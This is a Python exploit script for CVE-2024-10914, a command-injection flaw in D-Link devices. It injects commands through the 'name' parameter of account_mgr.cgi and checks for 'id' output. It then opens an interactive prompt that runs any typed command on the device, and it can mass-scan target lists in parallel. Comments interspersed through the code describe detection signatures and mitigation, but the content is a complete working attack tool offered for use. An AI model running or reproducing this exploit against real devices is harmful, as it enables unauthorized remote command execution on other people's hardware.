CVE-2024-10914.py
import requests
import re
import argparse
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
# Shared rich Console: every status line in this script is printed through it.
# rich interprets bracketed tags such as [red]...[/red] in printed strings by
# default, which matters wherever remote text is interpolated into a message.
console = Console()
# Banner
def print_banner():
    """Print the script's ASCII-art title, CVE label and author credit."""
    # Raw string so the backslashes in the art are not treated as escapes;
    # the bracketed tags are rich colour markup.
    banner_markup = r"""
[cyan bold] _______ ________ ___ ____ ___ __ __ _______ ____ _____ __[/cyan bold]
[cyan bold] / ____/ | / / ____/ |__ \ / __ \__ \/ // / < / __ \/ __ < / // /[/cyan bold]
[cyan bold] / / | | / / __/________/ // / / /_/ / // /_______/ / / / / /_/ / / // /_[/cyan bold]
[cyan bold]/ /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ / /_/ /\__, / /__ __/[/cyan bold]
[cyan bold]\____/ |___/_____/ /____/\____/____/ /_/ /_/\____//____/_/ /_/[/cyan bold]
[yellow]CVE-2024-10914 - D-Link Remote Code Execution Exploit[/yellow]
[red]coded by redspy[/red]
"""
    console.print(banner_markup)
# Request-path template for the device's account-management CGI. The `{}` slot
# is filled with command text, which ends up inside the `name` query parameter
# between `';` and `;'`. For defenders this is the signature to look for:
# requests to /cgi-bin/account_mgr.cgi with cmd=cgi_user_add whose `name`
# value contains quote or semicolon characters. Mitigation is on the device
# side: keep the management interface off untrusted networks and follow the
# vendor advisory for CVE-2024-10914.
endpoint = "/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';{};'"
# Static browser-like User-Agent sent with every request. Because it mimics an
# ordinary desktop browser it is a weak detection signal on its own; the
# request path and `name` value above are the more reliable indicators.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
}
def test_vulnerability(target, payload):
    """Send one probe request to `target` and report whether it looks vulnerable.

    `payload` is substituted into the module-level `endpoint` template and the
    resulting URL is fetched with a single GET. The target is reported as
    vulnerable only when the response has status 200 and its body contains
    text shaped like `id` output (`uid=N(name) ... gid=N(name)`). A payload
    whose output does not have that shape is therefore reported as "not
    vulnerable" whatever the device actually did, so a negative result is not
    proof that a device is unaffected.

    Returns True on a match and False otherwise. Any `requests` error is
    printed and turned into False rather than raised.
    """
    url = f"{target}{endpoint.format(payload)}"
    try:
        # verify=False turns off TLS certificate validation, so the host that
        # answers is not authenticated.
        response = requests.get(url, headers=headers, timeout=30, verify=False)
        if response.status_code == 200:
            # Looks for `uid=<digits>(<word>)` followed later on the same line
            # by `gid=<digits>(<word>)`.
            matcher = re.search(r"uid=\d+\((\w+)\).*gid=\d+\((\w+)\)", response.text)
            if matcher:
                console.print(f"[green][+] Target is vulnerable: {target}[/green]")
                # The matched text comes from the remote device and is placed
                # into a string that rich parses for markup.
                console.print(f"[green][+] Response: {matcher.group()}[/green]")
                return True
        # NOTE(review): indentation was lost in this listing; this fall-through
        # is assumed to cover both "non-200 status" and "200 without a match".
        console.print(f"[red][-] Target is not vulnerable: {target}[/red]")
        return False
    except requests.exceptions.RequestException as e:
        console.print(f"[red][!] Error with {target}: {e}[/red]")
        return False
def start_shell(target):
    """Run a prompt loop that sends each typed line to `target` as a command.

    Despite the name this is not a persistent session: every line is
    substituted into the `endpoint` template and sent as its own GET request,
    and the response body is printed. Each command is therefore a separate
    HTTP request to the account_mgr.cgi path, which is what would be expected
    to show up in the device's or an upstream proxy's access log.

    The loop ends when the user types `exit` or `quit` (case-insensitive) or
    presses Ctrl-C. Request errors are printed and the loop continues.
    """
    session = PromptSession(
        HTML("<ansicyan>Interactive Shell:</ansicyan> "),
        # History is held in memory only; this script does not write the
        # typed commands to disk.
        history=InMemoryHistory(),
    )
    console.print("[cyan][*] Interactive shell started. Type 'exit' to quit.[/cyan]\n")
    while True:
        try:
            command = session.prompt(HTML("<ansicyan>~$</ansicyan> ")).strip()
            if command.lower() in ["exit", "quit"]:
                console.print("[cyan][*] Exiting interactive shell.[/cyan]")
                break
            url = f"{target}{endpoint.format(command)}"
            # Shorter timeout than the probe (10 s vs 30 s); TLS certificate
            # validation is disabled here as well.
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            if response.status_code == 200:
                # The body is untrusted remote text and is printed through
                # rich with markup enabled, so bracketed sequences in it are
                # parsed as markup rather than shown literally.
                console.print(response.text.strip())
            else:
                console.print(f"[red][!] Command failed with status code: {response.status_code}[/red]")
        except requests.RequestException as e:
            console.print(f"[red][!] Error during request: {e}[/red]")
        except KeyboardInterrupt:
            console.print("\n[cyan][*] Exiting interactive shell.[/cyan]")
            break
def scan_file(file_path, payload, threads=5):
    """Probe every target listed in `file_path` using a thread pool.

    The file is read as text with one target per line; blank lines are
    skipped and surrounding whitespace is stripped. No other validation is
    applied, so every remaining line is contacted as given. Each target is
    passed to `test_vulnerability` with the same `payload`, at most `threads`
    at a time, and results are printed as they complete.

    Nothing is returned. `test_vulnerability` already prints its own verdict,
    so a positive result appears twice in the output.
    """
    # Opened with the platform's default text encoding.
    with open(file_path, 'r') as file:
        targets = [line.strip() for line in file if line.strip()]
    console.print(f"[yellow][*] Scanning {len(targets)} targets from file: {file_path}[/yellow]\n")
    with ThreadPoolExecutor(max_workers=threads) as executor:
        # Map each future back to its target so results can be labelled.
        futures = {executor.submit(test_vulnerability, target, payload): target for target in targets}
        for future in as_completed(futures):
            target = futures[future]
            try:
                if future.result():
                    console.print(f"[green][+] Target {target} is vulnerable.[/green]")
            except Exception as e:
                # test_vulnerability handles requests errors itself, so this
                # only sees exceptions of other kinds raised inside the worker.
                console.print(f"[red][!] Error with {target}: {e}[/red]")
if __name__ == "__main__":
    # Command-line entry point: print the banner, parse options, then run one
    # of two modes.
    print_banner()
    parser = argparse.ArgumentParser(description="CVE-2024-10914 RCE exploit")
    parser.add_argument("-u", "--url", help="Single target URL to test")
    parser.add_argument("-f", "--file", help="File containing list of target URLs")
    # The payload is only used for the probe; its default `id` is the one
    # command whose output the probe's regex recognises.
    parser.add_argument("-p", "--payload", default="id", help="Payload to test (default: id)")
    parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads for file scanning (default: 5)")
    args = parser.parse_args()
    # -u takes precedence: if both -u and -f are given, the file is ignored.
    if args.url:
        console.print(f"[yellow][*] Testing target: {args.url}[/yellow]\n")
        # The prompt loop is entered only after the probe reports a match.
        if test_vulnerability(args.url, args.payload):
            console.print("[cyan][*] Starting interactive shell...[/cyan]\n")
            start_shell(args.url)
    elif args.file:
        # File mode only probes and reports; it never opens the prompt loop.
        scan_file(args.file, args.payload, args.threads)
    else:
        console.print("[red][-] Please provide either a single URL (-u) or a file (-f) with targets.[/red]")